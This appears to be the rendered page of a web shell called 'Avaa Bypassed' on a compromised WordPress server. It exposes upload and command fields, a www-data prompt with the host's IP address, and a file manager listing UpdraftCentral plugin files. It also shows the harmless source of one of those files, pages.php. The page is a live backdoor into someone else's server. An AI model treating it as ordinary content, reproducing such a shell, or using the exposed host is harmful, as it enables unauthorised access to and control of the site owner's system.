[ Avaa Bypassed ]




Upload:

Command:

www-data@3.129.73.179: ~ $
<?php

if (!defined('UPDRAFTCENTRAL_CLIENT_DIR')) die('No access.');

// Load the posts command class since we're going to be extending it for our page module service/command
// class in order to minimize redundant shareable methods.
if (!class_exists('UpdraftCentral_Posts_Commands')) require_once('posts.php');

/**
 * Handles Pages Commands
 */
class UpdraftCentral_Pages_Commands extends UpdraftCentral_Posts_Commands {

	protected $post_type = 'page';
}

Filemanager

Name Type Size Permission Actions
analytics.php File 13.1 KB 0644
comments.php File 26.95 KB 0644
core.php File 15.41 KB 0644
media.php File 19.52 KB 0644
pages.php File 459 B 0644
plugin.php File 23.27 KB 0644
posts.php File 65.74 KB 0644
theme.php File 23.9 KB 0644
updates.php File 30.02 KB 0644
users.php File 18.66 KB 0644